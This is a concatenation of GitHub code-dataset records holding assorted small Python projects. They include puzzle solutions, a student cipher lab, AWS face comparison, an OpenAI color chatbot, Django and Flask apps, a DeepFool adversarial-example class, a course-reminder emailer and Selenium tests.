1\n elif fight_score == 0:\n self_score = 3\n else:\n self_score = 2\n elif self.opponent == \"B\":\n if fight_score == 3:\n self_score = 2\n elif fight_score == 6:\n self_score = 3\n else:\n self_score = 1\n else:\n if fight_score == 3:\n self_score = 3\n elif fight_score == 6:\n self_score = 1\n else:\n self_score = 2\n return fight_score + self_score\n\n\ndef create_turns():\n lines = read_file(\"./input.txt\")\n turns = []\n for line in lines:\n turns.append(Turn(line))\n\n return turns\n\n\ndef main():\n turns = create_turns()\n total_score = 0\n for turn in turns:\n total_score += turn.score()\n logger.info(\"total_score\", value=total_score)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gheritarish/advent-of-code","sub_path":"2022/02/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15304591943","text":"\"\"\"\r\nCSAPX Lab 1: Secret Messages\r\n\r\nA program that encodes/decodes a message by applying a set of transformation operations.\r\nThe transformation operations are:\r\n shift - Sa[,n] changes letter at index a by moving it n letters fwd in the alphabet. A negative\r\n value for n shifts the letter backward in the alphabet.\r\n rotate - R[n] rotates the string n positions to the right. A negative value for n rotates the string\r\n to the left.\r\n duplicate - Da[,n] follows character at index a with n copies of itself.\r\n trade - Ti,j trades the letter at index i with the letter at index j.\r\n\r\nAll indices number (the subscript parameters) are 0-based.\r\n\r\nauthor: Ethan Hartman\r\n\"\"\"\r\n\r\n\r\ndef shift(msg: str, idx: int, exponent: int = 1):\r\n \"\"\"\r\n Changes a letter at index 'idx' in the string 'msg' by moving it 'exponent' number of letters fwd in the alphabet.\r\n Negative values will shift the letter backwards in the alphabet\r\n :param msg: The message being transformed\r\n :param idx: The location of the letter being shifted\r\n :param exponent: The number of letters we are moving the main letter by.\r\n :return: Transformed string with a shifted letter\r\n \"\"\"\r\n return msg[:idx] + chr((ord(msg[idx]) - ord('A') + 26 + exponent) % 26 + ord('A')) + msg[idx + 1:]\r\n\r\n\r\ndef rotate(msg: str, amount: int = 1):\r\n \"\"\"\r\n Rotates the string 'msg' 'amount' positions to the right. A negative value for 'amount' rotates the string\r\n to the left\r\n :param msg: The message being rotated\r\n :param amount: The amount of characters being rotated\r\n :return: Transformed string with rotated letters.\r\n \"\"\"\r\n return msg[-amount:] + msg[:-amount]\r\n\r\n\r\ndef duplicate(msg: str, idx: int, copies: int = 1):\r\n \"\"\"\r\n Duplicates a character at 'idx' with 'copies' copies of itself\r\n If 'copies' < 0, that number of copies will be removed from the string\r\n :param msg: The message with a duplication\r\n :param idx: The location of the letter being duplicated\r\n :param copies: The number of copies we would like made\r\n :return: Transformed string with duplicated letters.\r\n \"\"\"\r\n if copies >= 0:\r\n return msg[:idx] + msg[idx] * copies + msg[idx:]\r\n else:\r\n return msg[:idx] + msg[idx-copies:]\r\n\r\n\r\ndef trade(msg: str, idx: int, swap_idx: int):\r\n \"\"\"\r\n Trades two characters at index 'idx' and 'swap_idx' with each other. We assume i < j\r\n :param msg: The message with a desired trade\r\n :param idx: The index of the first trade character\r\n :param swap_idx: The index of the second trade character\r\n :return: Swapped message string\r\n \"\"\"\r\n return msg[:idx] + msg[swap_idx] + msg[idx + 1:swap_idx] + msg[idx] + msg[swap_idx + 1:]\r\n\r\n\r\ndef transform(msg: str, operation_str: str, encrypt: bool):\r\n \"\"\"\r\n Transforms a given string, msg based on the given operations and the boolean, encrypt.\r\n Operations are parsed and their associated operation will be called with the given arguments\r\n The resultant string is returned\r\n :param msg: The message being transformed\r\n :param operation_str: The operations which will be executed\r\n :param encrypt: If we are encrypting or decrypting\r\n :return: The transformed message\r\n \"\"\"\r\n operations = operation_str.split(';')\r\n encrypt_mult = 1\r\n if not encrypt:\r\n # Decrypting requires reversed operations\r\n operations.reverse()\r\n encrypt_mult = -1\r\n\r\n for operation in operations:\r\n operation_name = operation[0]\r\n comma = operation.find(',')\r\n operation_method = None\r\n # assign an operation function\r\n if operation_name == \"S\":\r\n operation_method = shift\r\n elif operation_name == \"R\":\r\n operation_method = rotate\r\n elif operation_name == \"D\":\r\n operation_method = duplicate\r\n elif operation_name == \"T\":\r\n operation_method = trade\r\n\r\n # Determine parameters and call the operation method with those parameters\r\n if comma != -1:\r\n # Two parameters\r\n param1, param2 = int(operation[1:comma]), int(operation[comma + 1:])\r\n # T will not be changed between encrypting or decrypting\r\n msg = operation_method(msg, param1, param2 * encrypt_mult if operation_name != \"T\" else param2)\r\n elif len(operation) > 1:\r\n # One parameter\r\n param = int(operation[1:])\r\n if encrypt:\r\n # Normal case\r\n msg = operation_method(msg, param)\r\n elif operation_name == \"R\":\r\n # Rotate decrypt case. 'param' must be negated\r\n msg = operation_method(msg, param * encrypt_mult)\r\n else:\r\n # Other decrypt cases.\r\n msg = operation_method(msg, param, encrypt_mult)\r\n else:\r\n # No parameters given can only mean 'rotate'.\r\n msg = rotate(msg, encrypt_mult)\r\n return msg\r\n\r\n\r\ndef main() -> None:\r\n \"\"\"\r\n The main loop responsible for getting the input details from the user\r\n and printing in the standard output the results\r\n of encrypting or decrypting the message applying the transformations\r\n :return: None\r\n \"\"\"\r\n print(\"Welcome to Secret Messages!\")\r\n option = input(\"What do you want to do: (E)ncrypt, (D)ecrypt or (Q)uit? \")\r\n\r\n # Loop until the user chooses \"Q\"\r\n while option != \"Q\":\r\n if option != \"Q\":\r\n msg = input(\"Enter the message: \")\r\n operation_str = input(\"Enter the encrypting transformation operations: \")\r\n print(\"Generating output ...\")\r\n print(transform(msg, operation_str, option == \"E\"))\r\n\r\n option = input(\"What do you want to do: (E)ncrypt, (D)ecrypt or (Q)uit? \")\r\n\r\n print(\"Goodbye!\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"theeman05/School-Projects","sub_path":"RIT/CSCI 242/Lab1/src/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36630005508","text":"configuration = {\n 'stock_code_dict' : {\n 'Nikko AM STI ETF': 'G3B.SI', \n 'Lion Phillip S REIT ETF': 'CLR.SI',\n 'DBS Group Holdings Ltd': 'D05.SI',\n 'UOB': 'U11.SI', \n 'Invesco DB Silver Fund': 'DBS',\n 'Alphabet Inc.': 'GOOG', \n 'Apple Inc': 'AAPL',\n 'OCBC': 'O39.SI', \n 'Bitcoin USD': 'BTC-USD',\n 'Lion OCBC HS TECH ETF': 'HST.SI',\n 'NetFlix': 'NFLX',\n 'Microsoft': 'MSFT',\n 'Amazon': 'AMZN',\n 'Tesla': 'TSLA',\n 'AMC Entertainment Holdings Inc': 'AMC',\n 'Semileds Corp': 'LEDS',\n 'Harpoon Therapeutics Inc': 'HARP',\n 'Senseonics Holdings, Inc': 'SENS'\n },\n 'options_dict' : {\n 'stock/crypto/etf': \n [\n 'Invesco DB Silver Fund', \n 'Apple Inc', \n 'Alphabet Inc.', \n 'Nikko AM STI ETF', \n 'DBS Group Holdings Ltd',\n 'Lion Phillip S REIT ETF',\n 'UOB', \n 'OCBC', \n 'Bitcoin USD', \n 'Lion OCBC HS TECH ETF', \n 'NetFlix', \n 'Microsoft', \n 'Amazon', \n 'Tesla', \n 'AMC Entertainment Holdings Inc', \n 'Semileds Corp', \n 'Harpoon Therapeutics Inc',\n 'Senseonics Holdings, Inc'\n ],\n 'period': \n [\n '1d', '5d', '1wk', '1mo', '3mo', '9mo', '12mo', '36mo', '120mo', '240mo'\n ],\n 'interval': \n [\n '1m', '2m', '5m', '15m', '30m', '90m', '1h', '1d'\n ],\n 'moving average': \n [\n 'NIL', 50, 100, 200\n ],\n 'chart type': \n [\n 'Default', 'Candlestick', 'OHLC'\n ]\n },\n 'discrete_colours' : \n [\n '#FE00FA', '#0DF9FF', '#FF0092', '#22FFA7'\n ]\n}","repo_name":"KevinTan1203/Self-Initiated-Projects","sub_path":"Stock Visualisation/codeName.py","file_name":"codeName.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39224604484","text":"#simplified cache eviction using farthest-in-future approach\nimport random\nfrom datetime import datetime\n\nresources = ['a','b','c','d','e','f']\n\ndef createMemRef(n):\n #creates a list of n random memory references\n #a memory reference is a list of requests for certain resources\n #resources here will be from the set {a,b,c,d,e,f}\n random.seed(datetime.now())\n refList = []\n for i in range(0,n):\n currResource = random.choice(resources)\n refList.append(currResource)\n return refList\n\ndef farthestInFuture(n,k):\n #creates a random memory reference list of len n\n #creates a cache of size k (k < n)\n #generates an eviction list that minimizes the number of cache misses\n #a miss occurs when a resource is requested that is not in the cache\n #typically initially fill the cache with random elements from resources\n #to make analysis easier assume cache always starts with first k letters of alphabet\n evictionList = []\n #the eviction list will consist of tuples of the following form\n #(time the eviction occured, element removed from cache, element added)\n currCache = []\n for i in range(0,k):\n currCache.append(resources[i])\n memList = createMemRef(n)\n print(memList)\n for i in range(0,len(memList)):\n if memList[i] in currCache:\n continue\n else:\n #find element in cache that is needed the farthest in the future from now\n farthestAwayTime = 0\n farthestAwayElement = currCache[0]\n for j in currCache:\n if j in memList[i+1:]:\n currAwayTime = memList.index(j,i+1)\n else:\n currAwayTime = 100 #if we never need this element again then we know it's very 'far' away\n if currAwayTime > farthestAwayTime:\n farthestAwayTime = currAwayTime\n farthestAwayElement = j\n currEviction = (i, farthestAwayElement, memList[i])\n currCache.remove(farthestAwayElement) #remove farthest element from cache\n currCache.append(memList[i]) #add newest element to cache\n evictionList.append(currEviction)\n return evictionList\n\n\na = farthestInFuture(7,3)\nprint(a)","repo_name":"willjrowe/algorithmDesign","sub_path":"cacheEviction.py","file_name":"cacheEviction.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72731539974","text":"from os import system, name\nimport boto3\nimport time\nfrom multiprocessing import Process\n\n\n# POC code written to look through family photos and find who a specific person looks like\n# The idea being that if you have 30 photos of relatives (both living and dead), you can run this\n# code to see who the person in the image_to_compare looks the most like\n# This code was split out into several threads to help with the speed\n\nbucket_name = 'bucket_name' #Replace with your bucket name\ns3_prefix = 's3_prefix' #Replace with your S3 prefix containing family images\nimage_to_compare = 'image.jpg' #Replace with the person you want to do the comparisons for\nmax_threshold = 15 #Set a low max_threshold because we're comparing a person to other people--not\n #other photos of themselves\n\ndef findMatch(fileName, key):\n try:\n rek_client = boto3.client('rekognition')\n match = rek_client.compare_faces(SourceImage={'S3Object':{'Bucket':bucket_name,'Name':fileName}},\n TargetImage={'S3Object':{'Bucket':bucket_name,'Name':key}},\n SimilarityThreshold=max_threshold)\n if len(match['FaceMatches']) > 0:\n print ('Face: %s (%4.2f%%)' % (key, match['FaceMatches'][0]['Similarity']))\n #else:\n # print('Face: %s - NO MATCH' % (key))\n except:\n print('Invalid image %s' % (key))\n\n#detect a face\ndef detectFace(prefix, fileName):\n #Check to see if the found face matches a face in our Rekognition database\n processes = []\n s3_client = boto3.client('s3')\n response = s3_client.list_objects(Bucket=bucket_name, Prefix=prefix)\n\n #Loop over the photos in our bucket, but do this mutlithreaded to make it fast!\n for item in response['Contents']:\n p = Process(target=findMatch, args=(fileName, item['Key'],))\n p.start()\n processes.append(p)\n\n for process in processes:\n process.join()\n\n\nif __name__ == '__main__':\n start_time = time.time()\n\n detectFace(s3_prefix, image_to_compare)\n\n elapsed_time = time.time() - start_time\n print('Elapsed time: %d seconds' % (elapsed_time))\n","repo_name":"ueberhund/ml-examples","sub_path":"ai/rekognition-comparefaces-poc.py","file_name":"rekognition-comparefaces-poc.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72718178372","text":"import openai\nimport streamlit as st\nfrom streamlit_chat import message\nimport re\nimport os\nimport json\n\n# This will raise an error if the environment variable is not set\nif not os.getenv('OPENAI_API_KEY'):\n raise ValueError(\"Missing OPENAI_API_KEY environment variable\")\n\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\ndef generate_response(prompt):\n prompt = \"Give me a hexcode which matches with the following\"\n\n try:\n completion = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo-0613\",\n messages=[{\"role\": \"user\", \"content\": prompt}],\n functions=[\n {\n \"name\": \"hexcode_generator\",\n \"description\": \"Generate hexcode which will go well with the entered hexcode or color\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"hexcode\": {\n \"type\": \"string\",\n \"description\" : \"Generated Hexcode\",\n },\n \n \"user_query\": {\n \"type\": \"string\",\n \"description\": \"Answers any question by the user\"\n }\n\n }\n }\n }\n\n ],\n function_call= \"auto\",\n )\n except Exception as e:\n print(f\"An error occurred while generating response: {e}\")\n return None\n\n arguments = json.loads(completion.choices[0].message.function_call[\"arguments\"])\n message = arguments.get(\"hexcode\", \"Could not generate hexcode\")\n return message\n\n# EXECUTION OF THE PROGRAM STARTS HERE\n\nst.title(\"Hexcode Generator\")\nst.info(\"Enter a color or hexcode to continue\")\n\n# Storing the chat\nif 'generated' not in st.session_state:\n st.session_state['generated'] = []\n\nif 'past' not in st.session_state:\n st.session_state['past'] = []\n\ndef get_text():\n input_text = st.text_input(\"You: \", \"\", key=\"input\")\n return input_text\n\nprompt = get_text()\n\nif prompt:\n output = generate_response(prompt)\n if output is None:\n st.error(\"An error occurred while generating hexcode. Please try again.\")\n else:\n st.session_state.past.append(prompt)\n st.session_state.generated.append(output)\n\nif st.session_state['generated']:\n for i in range(len(st.session_state['generated'])-1,-1,-1):\n message(st.session_state['generated'][i], key = str(i))\n message(st.session_state['past'][i], is_user =True, key=str(i)+ '_user')\n","repo_name":"cumbersomeamir/hexcode-generator","sub_path":"hexcode-errorhandled.py","file_name":"hexcode-errorhandled.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5220933263","text":"\n# coding: utf-8\n\n# # Scipy: Scientific Python package\n\n# In[7]:\n\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nget_ipython().magic('matplotlib nbagg')\n\n\n# ## Optimization\n\n# In[4]:\n\nfrom scipy import optimize\n\n\n# In[28]:\n\ndef fonc(x, a = 1, b = 1):\n return np.exp(- a * x) * np.cos( b * x)\n\n\n# In[89]:\n\n# Target values:\na, b = 0.5, 4. # Ces valeurs sont inconnues !\nNp = 60\nxs = np.linspace(0., 5., Np)\nys = fonc(xs, a=a, b=b) + np.random.normal(loc = 0., scale = 0.5, size = Np)\nplt.figure()\nplt.plot(xs, ys, \"or--\", label = \"target\")\nplt.legend()\nplt.grid()\nplt.show()\n\n\n# In[40]:\n\ndef error(X):\n a, b = X\n y = fonc(xs, a=a, b=b)\n errors = y - ys\n return errors\n\nX0 = [0, 0] # Start point \nsol = optimize.leastsq(error, X0, maxfev = 10000)\nXf = sol[0] # Final values\nXf\naf, bf = Xf\naf, bf\n\n\n# In[90]:\n\nplt.figure()\nplt.plot(xs, ys, \"or\", label = \"target\")\nplt.plot(xs, fonc(xs, af, bf), \"b-\", label = \"solution\")\nplt.legend()\nplt.grid()\nplt.show()\n\n\n# In[96]:\n\nva = np.linspace(0.1, 2, 200)\nvb = np.linspace(-10., 10, 200)\nVa, Vb = np.meshgrid(va, vb)\n\n\n# In[97]:\n\nE = np.zeros_like(Va)\nNl, Nc = Va.shape\nfor i in range(Nl):\n for j in range(Nc):\n E[i, j] = ((fonc(xs, Va[i,j], Vb[i, j]) - ys)**2).sum()\n\n\n# In[98]:\n\nfrom matplotlib import cm\nplt.figure()\nplt.contourf(Va, Vb, np.log(E), 20, cmap = cm.jet)\ncbar = plt.colorbar()\nplt.contour(Va, Vb, np.log(E), 20, \n colors = \"black\", \n linewidths = .5)\nplt.xlabel(\"a\")\nplt.ylabel(\"b\")\nplt.title(\"Error, $\\log E = \\sum_i (y_i-y_{zi})^2$\")\ncbar.set_label(\"$E$\")\nplt.savefig(\"Error.pdf\")\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"lcharleux/Python_SISEO_1718","sub_path":"day3/scipy.py","file_name":"scipy.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6116853997","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom funds.models.project import Project\nfrom funds.models.rating import Rating\nfrom funds.models.projectPicture import ProjectPicture\nfrom funds.models.category import Category\nfrom django.db.models import Sum\nfrom django.db.models import Avg\n\n\ndef get_all_data():\n if Project.objects.all():\n projects_with_rating = Project.objects.all()\n project_list = []\n category_list = Category.objects.all()\n print(projects_with_rating)\n for p in projects_with_rating:\n rate = Rating.objects.filter(project=p).aggregate(Avg('rating'))\n if rate['rating__avg'] == None:\n rate['rating__avg'] = 0\n if ProjectPicture.objects.filter(project=p):\n img = ProjectPicture.objects.filter(project=p)[0]\n else:\n img = None\n dict = {\n 'project': p,\n 'rate': round(rate['rating__avg'], 2),\n 'img': img\n }\n project_list.append(dict)\n top_projects = sorted(project_list, key=lambda i: i['rate'], reverse=True)[:5]\n first_project = top_projects[0]\n top_projects.remove(top_projects[0])\n latest_projects = sorted(project_list, key=lambda r: r['project'].start_date, reverse=True)[:5]\n project_list = sorted(project_list, key=lambda r: r['project'].start_date, reverse=True)\n print(\"HERE NEW LIST OF 5 : \")\n print(latest_projects)\n context = {\n 'latest_projects': latest_projects,\n 'first_project': first_project,\n 'top_projects': top_projects,\n 'all_projects': project_list,\n 'category': category_list,\n 'Projects_by_category': None,\n }\n else:\n context = {\n 'latest_projects': [],\n 'first_project': None,\n 'top_projects': [],\n 'all_projects': [],\n 'category': [],\n 'Projects_by_category': None,\n }\n print(\"no data here \")\n return context\n\n\n@login_required\ndef index(request):\n if request.method == 'POST':\n projects_searched = []\n category_id = request.POST.get(\"category\", None)\n if category_id:\n Projects_by_category = Project.objects.prefetch_related('category').filter(category=category_id)\n print(Projects_by_category)\n context = get_all_data()\n context['Projects_by_category'] = Projects_by_category\n return render(request, 'funds/home.html', context)\n projects = Project.objects.all()\n result = {}\n searched = request.POST.get('searched').strip()\n if searched:\n for project in projects:\n if (searched in project.tags.names()) or (searched in project.title):\n projects_searched.append(project)\n return render(request, 'funds/search.html', {'searched': searched,\n 'projects': projects_searched})\n return render(request, 'funds/search.html',{})\n else:\n context = get_all_data()\n return render(request, 'funds/home.html', context)\n\n\ndef listCategoryProjects(request, category_id):\n projects_category = Project.objects.all().filter(category=category_id)\n context = {\n 'projects_category': projects_category,\n }\n return render(request,'funds/projectsByCat.html', context)\n\n\n\n","repo_name":"mohabrabie/EgyFund-Donation-System-by-Django","sub_path":"funds/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"2607509589","text":"from __future__ import absolute_import,print_function,division\n\nimport tensorflow as tf\nimport numpy as np\n\nclass DeepFool():\n\n def __init__(self,model,nb_candidate=5,overshoot=0.02,max_iter=200,clip_min=-1.0,clip_max=1.0):\n self.model=model\n self.nb_candidate=nb_candidate\n self.overshoot = overshoot\n self.max_iter = max_iter\n self.clip_min = clip_min\n self.clip_max = clip_max\n return\n\n\n def build_attack(self,pcm):\n self.pcm = pcm\n self.logits = self.model.get_logits()\n self.batch_iter = tf.placeholder(tf.int32)\n self.nb_classes = self.logits.get_shape().as_list()[-1]\n assert self.nb_candidate <= self.nb_classes, \\\n 'nb candidate should not be greater than nb_classes'\n \n self.preds = self.logits\n #self.preds = tf.reshape(tf.nn.top_k(self.logits,k = self.nb_candidate)[0],\n # [-1,self.nb_candidate])\n self.grads = tf.stack(jacobian_graph(self.preds[self.batch_iter,:],self.pcm,self.nb_classes), axis=1)\n return\n\n def attack(self,sess,sample,batch_size):\n adv_x = np.copy(sample)\n iteration = 0\n current = sess.run([self.model.get_probs()],feed_dict={self.pcm:sample})\n current = np.squeeze(current)\n if(current.ndim !=1):\n current = np.mean(current,axis=0)\n current = np.argmax(current)\n\n w = np.squeeze(np.zeros(sample.shape))\n r_tot = np.squeeze(np.zeros(sample.shape))\n original = current\n while(np.any(current==original) and iteration list:\n # for invalid input call self recursively to re-prompt user for data\n for i in range(len(prompt_arr) - stop):\n loop_prompt = start_str + prompt_arr[i]\n return_arr.append(input(loop_prompt))\n \n cases = intSanityCheck(return_arr)\n if (False in cases):\n return getReturnArray(prompt_arr, [], start_str)\n else:\n return return_arr\n\ndef promptStrBuilder()->list:\n # build prompt string\n result = []\n startStr = 'number of tests' \n midStr_Case1 = 'overall'\n midStr_Case2 = 'taken'\n endStr = 'this semester: '\n startEndArr = [startStr, endStr]\n midArr = [midStr_Case1, midStr_Case2]\n for i in range(len(midArr)):\n result.append(f'{startEndArr[0]} {midArr[i]} {startEndArr[1]}')\n result.append('score in percent for test: ')\n return result\n\n\n\ndef intSanityCheck(caseArr:list)->list:\n # to evaluate if the data recived is valid check if the data is an int\n returnArr = []\n for i in range(len(caseArr)):\n returnArr.append(caseArr[i].isnumeric())\n if returnArr[i] == False:\n try:\n float(caseArr[i].strip('-')) \n returnArr[i] = True\n except ValueError:\n returnArr[i] = False\n \n return returnArr\n\ndef promptFunctions(promptArr: list, returnArr, startStr:str='Please enter ')->list:\n # prompt user for data and return list of data\n # returnArr is list of data recived from user input\n returnArr = getReturnArray(promptArr, returnArr, startStr)\n \n # get the first & second elements of the list \n testTaken, testsTotal = returnArr[0:2]\n # strip any negative signs from the data not in the domain of the operation\n testTaken = testTaken.strip('-')\n testsTotal = testsTotal.strip('-')\n # \n # input already validated by getReturnArray, \n # take only 1-9 values, 10 term exams is unreasonable, cast to int \n returnArr = [int(testTaken[0]), int(testsTotal[0])]\n return returnArr\n\n","repo_name":"terpyPy/math125GradeCalc","sub_path":"calcLib/stringHandler.py","file_name":"stringHandler.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2585104403","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.alert import Alert\nimport time\nimport os\nimport keyboard\n\nclass case_use_unittest(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=r\".\\drivers\\chromedriver.exe\")\n\n def test_search_in_tabs(self):\n driver = self.driver\n localPage = 'file:///' + os.path.dirname(__file__) + '/statics/prompt.html'\n driver.get(localPage)\n element = driver.find_element_by_css_selector('.my-prompt')\n\n element.click()\n prompt = driver.switch_to.alert\n time.sleep(2)\n prompt.dismiss()\n time.sleep(2)\n\n element.click()\n prompt = driver.switch_to.alert\n time.sleep(1)\n keyboard.write('Hola')\n time.sleep(1)\n prompt.accept()\n time.sleep(50)\n\n\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == '__main__':\n case_use_unittest.main()\n","repo_name":"adancaym/pruebas-selenium","sub_path":"prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20928176827","text":"\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql import select, update\n\nfrom sql_app.crud.models import exerciseList\nfrom sql_app.workoutBuilder.schedule import update_schedule\n\nfrom ..database import settings, user_exercises, splits_sub_splits, user_misc, periods\n\n\n\ndef send_user_exercise_preference(db: Session, exerciseList: exerciseList):\n \n user_id = exerciseList.user_id\n\n for x in exerciseList.exercise_list:\n \n \n id= x.id\n max = x.max\n rc = x.ranked_choice\n fav = x.favorite\n active = x.active\n\n ins = user_exercises.insert().values(user_id = user_id, exercises_id = id, max = max, ranked_choice = rc, favorite =fav, active =active) \n result = db.execute(ins) \n \n db.commit()\n\ndef update_user_settings(db:Session, newSettings: settings):\n\n user_id = newSettings.user_id\n goal = newSettings.goal\n split = newSettings.split\n pd = newSettings.preffered_days\n cardio = newSettings.cardio\n \n stmt = update(settings).where(settings.c.user_id == newSettings.user_id).values(user_id = user_id ,goal = goal, split = split, preffered_days = pd, cardio = cardio)\n\n #print(update(settings))\n\n result = db.execute(stmt)\n\n db.commit()\n\n update_schedule(db, user_id)\n\ndef update_user_misc(db:Session, newMisc: user_misc):\n\n user_id = newMisc.user_id\n cp = newMisc.current_period\n vp = newMisc.variation_pref\n sl = newMisc.str_level\n \n \n stmt = update(user_misc).where(user_misc.c.user_id == newMisc.user_id).values(user_id = user_id,current_period = cp, variation_pref = vp,str_level=sl)\n\n #print(stmt)\n result = db.execute(stmt)\n\n db.commit()\n\n update_schedule(db, user_id)\n\n\n ","repo_name":"Joshmogil/training-app-project","sub_path":"main_dir/app_main_pyth/sql_app/crud/app_crud.py","file_name":"app_crud.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14763826541","text":"#!/usr/bin/env python\r\nimport sys\r\n# 程序功能:检查扩增子引物特异性\r\n# 输入:引物blast到ncbi代表性基因组上的结果,列表格式(-outfmt 6)\r\nlines = []\r\nwith open('primer-58-to-rep-all.m6', 'r') as fh:\r\n lines = [line.rstrip().split() for line in fh ]\r\n\r\namplicons = {} # 用于保存Forward引物的配对引物,键=forword primer,值=[amplicon]\r\nfor F in lines:\r\n if F[0][-2] != 'F':\r\n continue\r\n # 第一个引物所在的链\r\n primer1_strand = \"+\" if int(F[8]) < int(F[9]) else \"-\"\r\n\r\n # 第一个引物 基因组_开始_结束_引物名\r\n primer1_pos = \"_\".join([F[1], F[0], F[8], F[9]])\r\n\r\n # 循环列表,找出与前一个引物配对的引物\r\n for R in lines:\r\n if any([R[0]==F[0], R[1]!=F[1]]): # 引物名是自己,或者所在的基因组序列名不一样,都忽略\r\n continue\r\n\r\n primer2_strand = \"+\" if int(R[8]) < int(R[9]) else \"-\"\r\n # 条件1: 第1个引物在正链, 第2个引物在负链,第1个引物的起始位置小于第2个引物的起始位置(确保能扩出东西),扩增子长度 < 1000bp\r\n # 条件2: 第1个引物在负链, 第2个引物在正链,第1个引物的起始位置大于第2个引物的起始位置(确保能扩出东西),扩增子长度 < 1000bp\r\n cond1 = [primer1_strand==\"+\", primer2_strand==\"-\", int(R[8])>int(F[8]), int(R[8])-int(F[8])<1000]\r\n cond2 = [primer1_strand==\"-\", primer2_strand==\"+\", int(R[8])0 and te<16):\n #sender_name,recver_name,subject,text\n # em.sendEmail('电磁汪','mason','您有新的课程','课程内容等.......')\n text = \"课程名:%s\\n上课时间:%s\\n教室:%s\\n\\n\\n\\n祝好!\\n谢谢!\"%(x['course_name'],x['begin_time'],x['classroom'])\n self.ema.sendEmail(self.database.getUserEmail(int(x['course_id'])),'电磁汪','订阅者','15分钟后有课',text)\n index = self.course_list.index(x)\n print('格式1发送')\n del self.course_list[index]\n else:\n # print('line63else')\n time_cou = int(x['begin_time'][0:4])\n # print(time_cou)\n time_no = int(time.strftime('%H%M',time.localtime(time.time())))\n # print(time_no)\n te = time_cou - time_no\n \n if(56 > te and te >0):\n # print('line73::'+str(te))\n #sender_name,recver_name,subject,text\n # em.sendEmail('电磁汪','mason','您有新的课程','课程内容等.......')\n text = \"课程名:%s\\n上课时间:%s\\n教室:%s\\n\\n\\n\\n祝好!\\n谢谢!\"%(x['course_name'],x['begin_time'],x['classroom'])\n self.ema.sendEmail(self.database.getUserEmail(int(x['course_id'])),'电磁汪','订阅者','15分钟后有课',text)\n index = self.course_list.index(x)\n print('格式2发送')\n del self.course_list[index]\n\n #if(time_now-time_temp)\n\n\n\n\n def getTimeNow(self):\n time_now = int(time.strftime('%Y%m%d%H%M',time.localtime(time.time())))\n return time_now\n\n def getWeekToday(self):\n week_now = time.strftime('%a',time.localtime(time.time()))\n #Monday,Tuesday、Wednesday、Thursday、Friday、Saturday 、Sunday\n if('Mon'==week_now):\n return '01'\n if('Tue'==week_now):\n return '02'\n if('Wed'==week_now):\n return '03'\n if('Thu'==week_now):\n return '04'\n if('Fri'==week_now):\n return '05'\n if('Sat'==week_now):\n return '06'\n if('Sun'==week_now):\n return '07'\n\nif __name__ == \"__main__\": \n remind = Remind()\n self.loger.logRecord('系统关闭')\n self.ema.sendEmail(['zhaomangang@qq.com'],'电磁汪','mason','系统运行日志','系统关闭')\n","repo_name":"zhaomangang/CourseRemind","sub_path":"backgroundSystem/remind.py","file_name":"remind.py","file_ext":"py","file_size_in_byte":5275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23981811026","text":"from flask import Flask, jsonify\n\nfrom handler import switch_pin\nfrom flask_restful import reqparse\n\nparser = reqparse.RequestParser()\nparser.add_argument('pin', type=int, help='Target GPIO pin', required=True)\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/switch\", methods=['POST'])\ndef index():\n args = parser.parse_args()\n pin = args['pin']\n error = switch_pin(pin)\n if error:\n return jsonify({\"message\": f\"Error: {error}\"}, 500)\n return jsonify({\"message\": \"Success\"}, 200)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"hernannieto89/pig.gpio_handler","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72635497733","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\nclass node:\r\n distance = 10000000000000000000\r\n nearestTuple = []\r\n\r\ndef readData():\r\n trainingData = 